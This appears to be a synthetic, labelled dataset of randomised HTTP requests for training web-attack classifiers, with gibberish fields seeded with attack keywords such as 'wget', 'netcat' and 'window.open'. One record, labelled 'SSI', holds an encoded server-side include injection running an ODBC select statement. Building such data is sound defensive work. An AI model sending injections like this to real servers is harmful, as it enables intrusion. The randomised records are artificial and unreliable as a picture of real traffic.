If-Match: *
If-None-Match: "nJDfgGVa-sapimQO"
If-Range: Fri, 18 Jan 08 14:57:57 CET
Max-Forwards: 6210
MIME-Version: 2.4
Pragma: iecfln0=G
Proxy-Authorization: Digest qop=auth
Authorization: ohuy zdAs0=tni26a
Range: -35,310954-4,-65030
Referer: /nlJYaek.nsf
TE: chunked;q=0.5,chunked
Trailer: User-Agent
User-Agent: mtpnitihuaar2ebabges
UA-CPU: 68000
UA-Disp: 954,2900,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 040x289
Via: 1.2 141.194.156.178, 0.8 www.Tegooihe.html
Transfer-Encoding: vmcl; lceytg=yruooeh
Upgrade: liht/2.7, eelehi/2.3
Warning: 295 140.22.217.163 "uv2fUxytlf3rEnqh" "Sun, 03 Jun 07 20:15:54 GMT"
X-Forwarded-For: 25.104.91.31
X-Serial-Number: 95729667
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

esqsofdaabrOq0=s&1SB_Z=tusay&JkaMuB-=i&iso=9600&NQ4sD0v=12&ihTlwsn=494158917&g0nullcONhQ_c=nl4sq&wget3vivarjO6=rDODRv6BDVu&ioT=sylehpes~oe?g)tphooi&andeaIegneoorhe=ni&2npsaiiTti=So96hsn&as4enr4a3o6eUia=549126742&30eeiwii=tYUCZ0Yeyg&1yreet6=toanow$|re;MoE:d [s&j3tRiv8Ta7tN=h]Aselects5asidseob

End - Id: 6965
Start - Id: 6643
class: Valid
POST /iWQ8G8lczksfTzMW/WKt0IhTRDnodePih3/tntus/Clreplace5xGmCYYo7B/Ksoecncnelefi/oZF1cA_rFoZzfm/nudFyrc0/lrfppK/tkcYz8xce6l/ea3ltuualbda1iljp/zfhtemrS.htm? HTTP/1.0
Content-Length: 163
Content-Language: nuwseln
Content-Encoding: deflate
Content-Location: /Lnrlie/epje6/Nehf4ne.js
Content-MD5: dFRzb2V0YWlFMGFkc2FubA==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 15 Jan 08 14:57:52 GMT
Last-Modified: Sun, 15 Feb 09 12:29:24 UTC
Host: 7.162.165.160
Connection: wtnes9n
Accept: */*
Accept-Charset: shift_jis;q=0.5
Accept-Encoding: deflate, deflate;q=0.0, compress;q=0.3, compress, compress
Accept-Language: *;q=0.4
Cache-Control: no-transform
Client-ip: 38.128.144.1
Cookie: eeD5rooytac=foRsmugcpTr;tc=ypotElca2jEhq3tsa;nsdtyhe=cmde a[dselectiframeaieashep;rTMtbmdio=cpninwe;eWQSFEigW=1026;eetaco=nf6wea
Cookie2: $Version="16"
Date: Sat, 28 Nov 09 18:27:09 UTC
ETag: "1xfFMOhVK2.pnM_RnCs"
Expect: 100-continue
From: bdiim@E4ea.org
If-Modified-Since: Tue, 27 May 08 07:31:06 UTC
If-Unmodified-Since: Fri, 15 Jan 10 24:38:38 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 29 Jan 10 04:58:35 UTC
Max-Forwards: 8
MIME-Version: 2.5
Pragma: no-cache
Proxy-Authorization: NTLM cnp1Z3NpYXNmYlVvZWhvZWN0am5zYnZyckR0ZVpod2x0dHM=
Authorization: nojcv EexKa=afyt
Range: -07642,-5
Referer: http://no0bd.org/ockmalr7/utol9iyc/ai2n/eiehu.sh
TE: gzip
Trailer: Pragma
User-Agent: Mozilla/4.1 (Windows; U; Win 9x 0.3; tL-nb; rv:6.0.2) Gecko/73840726
UA-CPU: MIPS
UA-Disp: 7646,961,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 792x1593
Via: FTP/1.5 www.adliiaa.gif, HTTP/8.7 138.208.97.31:92
Transfer-Encoding: gzip
Upgrade: zfoa/4.4, me8e/8.0, eH5/5.3
Warning: 107 www.Hiehri.js "eswanigari" 
X-Forwarded-For: 239.4.241.123
X-Serial-Number: 1883916310
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

e9eo=vf&xp_Qfwq2LFS==Gd oe&taa4yfA=387631373&stjhdmel9gei1rh=diieeypod&RLHBP=)ilreS&rtzoHdncve=0&atcStiha3ce=8eer&mrIhs=olsrm<&tixoanwqTkl=-tn&r5rat9ar=etnra

End - Id: 6643
Start - Id: 21607
class: Valid
GET /eo8noe4z0asXige8r/netLs/CJ9QHx/ho7ptnlaDl0nsral/sCstmtipokp/nXwgULS_o2s/2piWyHdsSb1aui/keermtd.php?like63GJfRs=smc HTTP/1.1
Host: 18.112.219.83
Connection: close
Accept: */*
Accept-Charset: iso-8859-4;q=0.9
Accept-Encoding: identity;q=0.9
Accept-Language: *
Cache-Control: max-stale
Client-ip: 125.106.235.5
Cookie: ymrva1apgse2cIi=eNnmwindow.openo;allehn2wx=ait<sr6Spfnnx;a5lgcLfahj=i3mxoelhsdsdtn=y1e;fr6mMataf8Tib=601818
Cookie2: $Version="45"
Date: Thu, 30 Apr 09 13:23:15 UTC
ETag: "Ji8WC_v9dK6Pm0y"
Expect: 100-continue
From: tobWrwtn@esCei1hec.st
If-Modified-Since: Thu, 25 Feb 10 21:22:09 UTC
If-Unmodified-Since: Thu, 04 May 06 08:49:50 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 22 Nov 06 01:05:06 CET
Max-Forwards: 134
MIME-Version: 0.6
Pragma: ei4ydsE='liti'
Proxy-Authorization: Digest uri=/onIn.png
Authorization: Basic ZXRubHJlczpzckh6dA==
Range: 395011-,3-,79399-5
Referer: http://www.pqoy1.st/fessiy/euct/taofp/johtaoh.php3
TE: gzip,trailers
Trailer: Accept-Encoding
User-Agent: dnodtbQrbG/8.8
UA-CPU: x86
UA-Disp: 198,1596,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 592x4496
Via: FTP/9.2 3.215.81.247
Transfer-Encoding: nrdp1a; op1j=oonh
Upgrade: 4erenr/4.2, dJoBc/5.1, ohere/8.1, 9Ut/5.9
Warning: 454 253.133.69.76 "ooerIseMeAi7r9coias" "Sat, 14 Oct 06 08:48:24 UTC"
X-Forwarded-For: 12.32.11.193
X-Serial-Number: 0418048557333038
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 21607
Start - Id: 3050
class: Valid
GET /ooNg7FMCwpwQs/ut_@Pw2MQGk05kfj@8/esjttnpIaJ/ov.shtml?ras5eWeE8v=n6oabe6os&IaeeOdqTnOhi=s3arc%3CJt4td&itmt=445&Leipot7s=eagai&si=s8amnrist%7Cr2imgn&0SnE=541214&tmhintN=s%3Avbscriptin25pEFaeooac9Tr%2F&sshth4=ePAr24JrZuux&tkenetofeotg=eo&bs05she=69488971 HTTP/1.1
Host: 137.220.197.119
Connection: adjaa
Accept: */*;q=0.0
Accept-Charset: iso-8859-15
Accept-Encoding: compress;q=0.1
Accept-Language: *
Cache-Control: min-fresh=44693
Client-ip: 71.140.195.36
Cookie: il=?ote/divreh
Cookie2: $Version="178"
Date: Tue, 28 Mar 06 16:06:11 CET
ETag: W/"-4jQJSFrMTi0Ubv7F"
Expect: yepnctt
From: clms@lki1al.be
If-Modified-Since: Wed, 12 May 04 04:35:29 GMT
If-Unmodified-Since: Tue, 06 Jan 09 07:13:56 CET
If-Match: "6PPZjRkB3MFascEzYz@m"
If-None-Match: *
If-Range: Fri, 07 Mar 08 06:31:01 GMT
Max-Forwards: 4503
MIME-Version: 6.8
Pragma: dp1hbFoa=sq
Proxy-Authorization: em1h oanPog=nsx8qtr5
Authorization: Basic bWh3aDpoU2Vzb3Bz
Range: -5,4-,8177-71443
Referer: http://www.esno.org/f8hs3/awNazsq/mmcWtt/eeueoxsl.tiff
TE: trailers,trailers
Trailer: Trailer
User-Agent: Mozilla/8.8 (Machintosh; U; PPC Mac OS X 8.6; q2-np; rv:6.9.8) Gecko/71035265
UA-CPU: PowerPC
UA-Disp: 3168,424,16
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 3313x7933
Via: HTTP/0.8 230.201.46.250:06, eo6/4.0 128.51.235.242:1
Transfer-Encoding: identity
Upgrade: Oso/1.6, n77i/2.9, maoeo/6.3, 6lx/0.3, nnpy/1.7
Warning: 569 www.oeereniu.htm:0303 "atsetrg" "Wed, 17 May 06 18:16:08 CET"
X-Forwarded-For: 9.39.20.77
X-Serial-Number: 79351042472156559
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3050
Start - Id: 19840
class: Valid
GET /2DXSE2hKVXA4nL/er53.KZ83Sgc/nnaHhyakazryoy0uuReT/inn/o5WUWF.6AvB/dw-gwBH2v6NBcKkY6vf/cbZ3u3KFY/tU03k7ZareegJj5q6h/saaoercn4aEdsZaseqy/r3fG17qg0P.cgi?now5I=701430&lyes2S6otecge1n=719&dGA8RO=tt&CQ0Gs0acmd4betweensystemx=enloegn&39CYsJ7=rvC HTTP/1.0
Host: 105.146.207.153
Connection: j9hQetF
Accept: image/gif;q=0.2, application/*;q=0.3
Accept-Charset: *
Accept-Encoding: compress, deflate;q=0.9, gzip;q=0.4, deflate
Accept-Language: *
Cache-Control: no-transform
Client-ip: 18.141.33.165
Cookie: smefeaHrteteTDu=83277;xEir=egm;ewele=tmp0eae;Lkpwinnt2H=nge7elmhnr;rrh= E
Cookie2: $Version="666"
Date: Sat, 23 Aug 08 21:12:14 CET
ETag: "QqBFDe-vjUadicJInMe"
Expect: y2Szemat=aeewSu;e5dz04l=nnNt
From: ltreys@reovt.gov
If-Modified-Since: Wed, 09 Jun 04 01:12:53 GMT
If-Unmodified-Since: Tue, 26 Jan 10 10:17:17 GMT
If-Match: *
If-None-Match: *
If-Range: Sun, 15 Jul 07 07:23:41 GMT
Max-Forwards: 6464
MIME-Version: 2.8
Pragma: SH=db
Proxy-Authorization: Digest username="NoExp"
Authorization: asdsca broUbot=v1Hmd
Range: 31-27672,31-,92-
Referer: http://www.pscu.net/iaw7hnt/N0r1tt/ttsi/htsc/irY6xlm.asmx
TE: chunked
Trailer: Accept-Encoding
User-Agent: Mozilla/4.5 (X11; U; Open BSD i586 1.1; rW-po; rv:4.1.8) Gecko/95456977
UA-CPU: StrongARM
UA-Disp: 563,5037,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 850x3369
Via: een/4.2 209.102.138.43, 1.6 74.36.67.200
Transfer-Encoding: identity
Upgrade: urt/1.5, duy66/3.8, 6ru/6.9, sii/9.2
Warning: 943 237.25.13.45 "Lnhareesflia5" 
X-Forwarded-For: 176.249.106.242
X-Serial-Number: 09282554265324
----: ----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19840
Start - Id: 19062
class: Valid
GET /skee/o0pfsIH2bnpr8ol/elEntl8l8i6oe9asmhhh/@oR27X4.jpg?wsleInSSE=63388698&ubhriB=41&YIHnt1oZ=031&tanveNsrewh=7879&lnmyMtosgseu=23&hadtOolaec=window.openhesb%27&eoiulise=aiaaIireO HTTP/1.1
Host: www.Vyn0U.uk:80
Connection: close
Accept: */*;q=0.3
Accept-Charset: iso-8859-15;q=0.7, windows-874;q=0.6
Accept-Encoding: *;q=0.7
Accept-Language: *;q=0.8
Cache-Control: no-cache
Client-ip: 47.236.3.147
Cookie: fscript62T=693023350;3gsan1t2=aap1RTg;mptnee2GNnE97dt=ny
Cookie2: $Version="07"
Date: Thu, 15 Jan 04 03:59:15 GMT
ETag: W/"iFZ3v4f1P9ezQXFcZLr2"
Expect: dtwsiarI
From: meOreslm@oakuitLO.de
If-Modified-Since: Wed, 17 Sep 08 10:27:54 UTC
If-Unmodified-Since: Mon, 14 Apr 08 24:16:22 UTC
If-Match: "dY@J2XIMMeJzLdnD"
If-None-Match: *
If-Range: *
Max-Forwards: 419
MIME-Version: 4.1
Pragma: no-cache
Proxy-Authorization: NTLM NHBwdDFldGVlaXQxbm1nb3J0SXRobnlubnRyczV0ckFobmhlYQ==
Authorization: Basic a2VtbTplcmlhc3R0
Range: 0-122,891-2377,320-202511
Referer: /uupveae/sejhr/tbnaa9.jpeg
TE: trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/3.0 (compatible; MSIE 6.0; Win98; ereievs)
UA-CPU: MIPS
UA-Disp: 087,0776,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 323x8856
Via: FTP/9.1 www.hYtdn6s.png:250
Transfer-Encoding: deflate
Upgrade: Nini/5.2, 1Sitkn/4.6
Warning: 437 24.24.24.100 "7MweOrlohfnta5faMmu" "Mon, 02 Apr 07 12:46:21 CET"
X-Forwarded-For: 203.182.207.188
X-Serial-Number: 594077
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19062
Start - Id: 9055
class: Valid
GET /er@jvlR7iMkmK6I2n/4nohl/tf/ei/e9bMbxzQG2W_7/rsem/eLYhJNeYqhG_DCo21q3/uRieat9lerbn/dTnQAm@9oKHA/ie.asp? HTTP/1.0
Host: www.Tn0tAOait.fr
Connection: u5ari
Accept: image/*;q=0.5
Accept-Charset: koi8-r, x-mac-chinesetrad, euc-tw
Accept-Encoding: deflate, compress;q=0.4, gzip
Accept-Language: hoOtere-peal;q=0.0, neooesm-2, lqn-e
Cache-Control: no-transform
Client-ip: 0.159.135.39
Cookie: thlaebshxqer=266402664;nksehce=dm02DzLX7N;fzdal=tcikeaEhoiiesE;mi=qgYoe;YZMIxp_MHXhN=80;metawwgettSz3JtconnectV1=ye/elr6a6
Cookie2: $Version="697"
Date: Thu, 29 Jul 04 09:32:04 CET
ETag: "KoTQ8MRH79vQlgwbG_"
Expect: mjl9tid
From: loeh@anr2ui.de
If-Modified-Since: Sat, 05 Dec 09 11:42:44 GMT
If-Unmodified-Since: Thu, 25 Nov 04 03:32:55 GMT
If-Match: *
If-None-Match: "D189zS0Jnvs8@-ad@"
If-Range: "MLm6bJxfMk2@gdcRJo"
Max-Forwards: 08
MIME-Version: 8.0
Pragma: hMqoe='l'
Proxy-Authorization: Basic bjljbjpwbG9lMG9sZQ==
Authorization: NTLM c2V0bHFpVGNkYXI1ZXJlaXhheGxyZ243Y2F0Z2RoZURtcmhlZQ==
Range: -9,-8753
Referer: /ptnWxE/o14Iu/hEYroV.tiff
TE: trailers,gzip;q=0.6
Trailer: Accept-Language
User-Agent: Mozilla/0.1 (X11; U; Solaris 6.9; tc-m3; rv:1.4.3) Gecko/08399363
UA-CPU: 68000
UA-Disp: 539,7615,16
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 1506x4944
Via: 9.6 111.212.189.137, 5.3 239.206.196.81
Transfer-Encoding: visi
Upgrade: ath/5.4, nuent/5.4, Lijt/8.7, EXwiq/1.9, ab7/2.3
Warning: 394 66.20.115.11 "wuelrtshiipI1Cr9mi" "Mon, 05 May 08 03:16:51 CET"
X-Forwarded-For: 41.199.240.170
X-Serial-Number: 442361
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9055
Start - Id: 40868
class: SSI
GET /lOVnodeIrx0/rr7.zev5kggfIF/Ionnhtt3/tekahd/eX9X_9xmza0T@sly7R.php3?mochaoe4=bwc%7Eok&nEuGifill=nsi&NDGNkHLG=916916&l6eW0a4=g3er&toIe0hn=%3C%21--++++%23odbc+++statement%3D++++%22select++++EU%2C+Hb%2C+++++wned+++++from+++++egt4++++order++by++8%2C+30%2C+++++4%22+--%3E HTTP/1.0
Host: www.suyedow.com:16
Connection: aed5g0re
Accept: image/*;q=0.7, application/*;q=0.4
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=8
Client-ip: 166.148.98.20
Cookie: Pf9vHTand=atttb;tZaloNnok0=37175236;a0E1liah1t=rIHH;hbChaRrgDdheesi=oKr9OFN;SwinntkW2lXg=0317739
Cookie2: $Version="93"
Date: Sun, 10 Jun 07 11:43:26 CET
ETag: "sKr@_Vwhn_E5hW1u"
Expect: 100-continue
From: xhslhnd@1eneubz.it
If-Modified-Since: Thu, 08 Apr 04 17:47:58 GMT
If-Unmodified-Since: Tue, 15 May 07 06:18:18 GMT
If-Match: *
If-None-Match: "U8A2Imsd7wd2@Ey"
If-Range: "LVPH1NkG@4g7F9t5qiG-"
Max-Forwards: 4
MIME-Version: 6.0
Pragma: no-cache
Proxy-Authorization: dNre ae1tadjl=gqbi
Authorization: NTLM c2Fvd3JwZGZjc2J4SXNzZGF4MWhyM2J0blR0cGRpOWV6eA==
Range: -375,-4
Referer: /cDHinhpo.htm
TE: deflate,trailers
Trailer: Upgrade
User-Agent: 7qtie (t.R85P78oF; eXoKyxJjA; i-zvD8A@b)
UA-CPU: x86
UA-Disp: 998,969,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 5993x410
Via: 5.4 161.243.89.169:47, 2.9 www.nedo7.tiff, 5.8 www.ieiEl6e.css
Transfer-Encoding: gzip
Upgrade: saht/3.7, 9sha/5.8, Eossd/8.6, rms/3.5
Warning: 063 170.129.30.215:3080 "tttenlbdte1UerRsne1h" 
X-Forwarded-For: 38.3.235.137
X-Serial-Number: 49586702317462
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 40868
Start - Id: 9718
class: Valid
GET /eho@uz/Kfq4FkPxB8YeH4G/ecN@TkLT.jsp?namf=Ovgwbeiesmru7&dnaiaa=3&5t=snaStstieta1tkeals&eaprfTrd6tCinRS=isd%3Ch&roatjiit9lu4=ichear+vlub-efvzlreX&7r=7613&et7tfgIpe=soabetweenoconnectr&i7freeoqC5n=PT02pvo&OetejnaCeRsouei=cwiabctf HTTP/1.0
Host: 160.114.117.223
Connection: close
Accept: */*;q=0.0
Accept-Charset: iso-8859-4;q=0.5
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=196
Client-ip: 130.86.54.98
Cookie: nzcwhyfCcy=8258110;estSs7=xdwx7g4wcVa
Cookie2: $Version="608"
Date: Fri, 10 Jun 05 12:11:05 CET
ETag: W/"DJNzeDYWi.q7Ci0JSt"
Expect: tihPx=nn3kdjz
From: e6u7@maaoofdu.fr
If-Modified-Since: Wed, 03 Sep 08 19:19:39 GMT
If-Unmodified-Since: Sun, 20 Mar 05 03:21:24 CET
If-Match: "BrpD7Ct12nFnz9Q5@3j"
If-None-Match: *
If-Range: *
Max-Forwards: 2007
MIME-Version: 9.0
Pragma: no-cache
Proxy-Authorization: Digest nc=aCF05B7C
Authorization: NTLM dGl6aGl1amF1YWVpaW9YeWVyaGFhZGxpc3AzaXRQaW9UcjFhbGloc3RuN3M3cnRl
Range: 01-02679,59-393,3975-
Referer: http://www.s1t2dao.it/t1t7egt/mjeytksn/dhjr/8nir/ibrnd.aspx
TE: trailers,deflate,trailers
Trailer: If-None-Match
User-Agent: sfdh (mKkJuxpcNU)
UA-CPU: StrongARM
UA-Disp: 985,159,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 6817x021
Via: FTP/8.6 www.deeotu3p.shtml, HTTP/9.6 124.147.198.245
Transfer-Encoding: compress
Upgrade: e3d/8.2
Warning: 433 www.ehhrp.gif:2957 "rSrtoo9noa" "Mon, 31 Oct 05 18:45:44 CET"
X-Forwarded-For: 186.223.84.207
X-Serial-Number: 66630290652
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 9718
Start - Id: 32271
class: Valid
GET /services4YFLwindow.openYRSq/1umeh/hz2pUU/vMee6weyd9nEem7t4ag/c3e/aHZ2Dh5_T@xA/te/wvnX/ibfE9m/aEWXcXh/f3erqG-TX.php?nb=84002478&t8i=E&whi=steeei5ievs0u&Cnieknnssut5yt=oeSs&httpx1=IhNDentwodh%5CtT&aaretcou=boi6y7&arueepresNq=487070&eoine53stdiawoi=%26netcateaql2t&eixSlOcou=8577595&jdocumentBrvX=8TZ_Bcq&VAdZfuSC=4688&eeiStbtart1s=akO2lpzlonl&zee=7 HTTP/1.0
Host: 154.180.163.24
Connection: close
Accept: */*;q=0.0
Accept-Charset: cp-932;q=0.9, cp-936;q=0.2, ks_c_5601-1987;q=0.1, iso-2022-jp
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: max-age=7107
Client-ip: 21.59.244.222
Cookie: dFNtbsxnitaifhi=3aetesi\e;lchildDE5x-=%a5hit
Cookie2: $Version="0"
Date: Wed, 29 Jun 05 11:00:05 UTC
ETag: "t2Zyi.JG02tg1UXRlkK"
Expect: 100-continue
From: reTalc0@UoiRxreIr5.uk
If-Modified-Since: Tue, 05 Aug 08 13:22:12 UTC
If-Unmodified-Since: Thu, 12 Apr 07 08:18:19 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 08 Aug 09 20:03:40 UTC
Max-Forwards: 237
MIME-Version: 5.8
Pragma: dyEoIl=tyrp
Proxy-Authorization: srie 7y85rp=eaTsher
Authorization: NTLM dHdJbnZUYXVlejFuc29yZW85aGFwaGpuT2Nla2hkczJJNzZjYWU=
Range: -265,3-,-2
Referer: /euamH/5deniRok/jonh/emadf/cnahon5.gif
TE: trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/0.1 (Windows; U; Win98 2.8; oy-db; rv:3.6.4) Gecko/62617384
UA-CPU: x86
UA-Disp: 8350,6514,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 3225x292
Via: isd/5.9 www.ibxec6dc.js:96675
Transfer-Encoding: eeeE; ay9t=uuon4s
Upgrade: igmn0b/4.9, aorfth/1.2, srr/7.4, mp7/8.9, npq/6.9
Warning: 276 144.197.192.204 "hsEwst6bs9l" "Wed, 19 Mar 08 20:42:32 GMT"
X-Forwarded-For: 132.144.23.218
X-Serial-Number: 46136002829246139773
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 32271
Start - Id: 32503
class: Valid
GET /hentco7/l1fze7la/ksystemf0z.mdb?gbhwEa=sT5TgOtAC1&aNAllshECn=o&uui2aendttaezy=5&fwsoinhsa=07cqm6P&naslTrhi=5953 HTTP/1.0
Host: 179.119.54.47:4568
Connection: keep-alive
Accept: */*
Accept-Charset: euc-kr, x-mac-roman
Accept-Encoding: compress, gzip;q=0.4, gzip;q=0.2, deflate;q=0.1
Accept-Language: s-sstl5i;q=0.0
Cache-Control: max-stale
Client-ip: 53.255.204.193
Cookie: aiAp=2267574809;ateHv=iti22htbrrtt;hstlesndaa97=7
Cookie2: $Version="6"
Date: Thu, 12 Oct 06 09:33:26 CET
ETag: "1eiv9ZzQSwpJKjs88uV"
Expect: 100-continue
From: tnhcz@tatee4su.com
If-Modified-Since: Tue, 06 Jan 09 11:50:36 CET
If-Unmodified-Since: Fri, 09 Jul 04 02:59:03 UTC
If-Match: *
If-None-Match: *
If-Range: "ovaUrFtxGAEQTgtY3PYt"
Max-Forwards: 5
MIME-Version: 2.7
Pragma: no-cache
Proxy-Authorization: nuEoh mgtwuaa=deo2ijmr
Authorization: Basic ZUV0dW5mdzpzb3VsZUM=
Range: 61872-,1-23590
Referer: http://www.sus4a.gov/plettrf/Eemef/rainee.php4
TE: deflate
Trailer: Via
User-Agent: oDOndduGgugHmV
UA-CPU: x86
UA-Disp: 496,188,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 5986x8829
Via: 2.2 245.192.68.226, FTP/2.8 253.212.13.135:9244, HTTP/8.0 www.alweu.jpeg
Transfer-Encoding: whiDol; wmsuts2=vli2T
Upgrade: ottr8/8.0, iwmS/1.0, oey/2.0, rief/2.4
Warning: 101 4.89.40.8:21062 "akHa4tdddrpeehjib" 
X-Forwarded-For: 58.126.132.76
X-Serial-Number: 31593732
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 32503
Start - Id: 12103
class: Valid
GET /.7wCc/lIucaa3darf/uqSc/dEJgxaI-JH@i_SDvjvr/co-gOQEN06pzMZYz/wp3cLN1tb/rKni1V9u.CEv-py-aW9t/0dgKjyV0netcatc/UfskbshmrfSainei.html?r5pEnteoaeso=021&oapioralsa=ssoeobu9dtonx6ie&1ra=tsaccess_logt&5e=h.54hkQUf9E&dilpe13ame=80939&dsaagEm=ek3Y7V2bJuG&ilbftp4ajenac=i5wRiQ&nxgs=p-cb&9eySh=z&rsltDlw=%2Fano+tsprspnci&igoilumdk=zhru8i8toeb&hD7eettrsCs=3&pJdltoi=p%7C-R%3D44tda HTTP/1.1
Host: 242.28.165.6:80
Connection: keep-alive
Accept: */*
Accept-Charset: koi8-r, euc-tw
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=69039
Client-ip: 161.155.47.193
Cookie: or5Uhlnewva=s_QgZBe;2a=rr;6e=aiaaceX;tt=s7;us9esl=r.5xp9s.yO
Cookie2: $Version="4"
Date: Thu, 15 Sep 05 18:34:57 UTC
ETag: "B_yWLx.fRRhYiw6gV"
Expect: Epfsht
From: nj6pNha@dohie.ch
If-Modified-Since: Sun, 17 Jan 10 01:32:12 GMT
If-Unmodified-Since: Tue, 26 Jan 10 16:23:34 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 03 Jan 07 24:20:10 CET
Max-Forwards: 591
MIME-Version: 2.8
Pragma: oviruo='Slie8e'
Proxy-Authorization: tdsfn gn6Hi=ruDos9tw
Authorization: yjaeta otajoon=tlkrie
Range: 1-,409083-6369
Referer: /eneaulsN/tyeesis/sbje3/eo0chu/f0rmdsra.mpg
TE: gzip
Trailer: Trailer
User-Agent: Mozilla/8.2 (compatible; Konqueror/1.0; Mac OS X; drduihe; npca40eg)
UA-CPU: Sparc
UA-Disp: 3494,5887,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 6469x6483
Via: 6.1 www.air6rinj.png, nswr0l/7.3 97.130.74.123:579, 1.8 24.163.46.57
Transfer-Encoding: identity
Upgrade: Cdr/9.5, gton/2.2
Warning: 364 www.rnndhhu.html "lNiB7of9mccT8t4" 
X-Forwarded-For: 168.173.15.142
X-Serial-Number: 572256
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12103
Start - Id: 18107
class: Valid
GET /foDoGmhQC_Tay0q/nLnPrimOJeodsos/i8AGSq16Rk_Acq/if60dZvFy/n7Wjv6@CB-r/reivrl0uei54oncno/sneclskakynay.pl?es9ysf=7&optpuiss9=iZg1WGr4J65J&exosce=wO+Ee%26sn+nopt7iWll&d00Rinn7db=597&hzNMG=NTs%40uaho&p8sarlLeRsia=uamaecOatr HTTP/1.0
Host: 72.89.59.110
Connection: close
Accept: */*
Accept-Charset: euc-tw;q=0.9, euc-jp;q=0.0, us-ascii;q=0.7
Accept-Encoding: compress, compress;q=0.8, deflate;q=0.4, deflate;q=0.1, compress;q=0.2
Accept-Language: *;q=0.4
Cache-Control: loaw='fdeo'
Client-ip: 93.75.151.168
Cookie: bZHAl@fc.Cinput=177;bQFt5HYL@s_wget= Nyobjecta6Nlool4c|;cmdneconnectQdocumentS=akw0gT5h;nptxsrteoEh=06171;Fa=6423847
Cookie2: $Version="1"
Date: Fri, 31 Dec 04 23:42:48 UTC
ETag: W/"fuXBEtERaZdePjWV"
Expect: 100-continue
From: oecjtte@aJits.ch
If-Modified-Since: Fri, 31 Dec 04 05:48:58 CET
If-Unmodified-Since: Wed, 19 May 04 13:13:00 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 25 Feb 06 03:52:38 GMT
Max-Forwards: 6
MIME-Version: 5.1
Pragma: a='cmel'
Proxy-Authorization: Basic YWhnZGE6bmlpN1R0
Authorization: Basic dHMybmlrZTY6ZnJyZQ==
Range: -232
Referer: http://rfTa.ch/narednm.msf
TE: trailers,deflate
Trailer: Accept-Encoding
User-Agent: siI4tsn/5.0.0.1
UA-CPU: Sparc
UA-Disp: 2247,5505,32
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 259x791
Via: 8.8 196.40.139.247, 6.6 www.sD9Ntibi.html, 5.1 254.61.69.165
Transfer-Encoding: compress
Upgrade: easn/7.4, sssja/2.0, iqc/5.0
Warning: 285 108.191.36.249 "oeiebe4a" 
X-Forwarded-For: 7.193.95.179
X-Serial-Number: 818072952381662681
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~

null

End - Id: 18107
Start - Id: 15081
class: Valid
GET /oa/mPEzbLu79f/qkHIU_Z.gif?w1logNtR@=xp_e&eroihi2gn1tzfe=e&iantm3rt7hrros=250406 HTTP/1.1
Host: 166.57.221.181
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: identity;q=0.8
Accept-Language: rtonh-or9;q=0.0, ngsyfntl-xt;q=0.0
Cache-Control: no-store
Client-ip: 217.63.120.74
Cookie: tnu=532709
Cookie2: $Version="91"
Date: Sat, 02 Aug 08 05:32:17 CET
ETag: W/"V6SQnlPNth6MI3E1aRw"
Expect: 100-continue
From: iotovaam@tsned.org
If-Modified-Since: Fri, 18 May 07 13:03:23 UTC
If-Unmodified-Since: Thu, 18 Dec 08 17:24:21 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 2018
MIME-Version: 2.9
Pragma: Zudo8f=gh
Proxy-Authorization: NTLM dDdzZXMwbHV4V3I3dG1vZGlyYWVvZmFhaGVzaHNzc3RzZU9XWjBmb2NvSGU=
Authorization: NTLM bGxzcm81ZGVvZXdzdGZhZGF0cm5ycjlsbm93U2xoN29sSHRJZXBpc2Nmbg==
Range: -3610,072048-063,-8
Referer: http://atsBr.net/mvSla7/lditd/drealetd/6hmaaU/5Etut5ad.gif
TE: trailers,chunked
Trailer: If-Modified-Since
User-Agent: Mozilla/7.9 (Machintosh; U; Mac OS X 6.5; ne-Pu; rv:5.5.1) Gecko/49816585
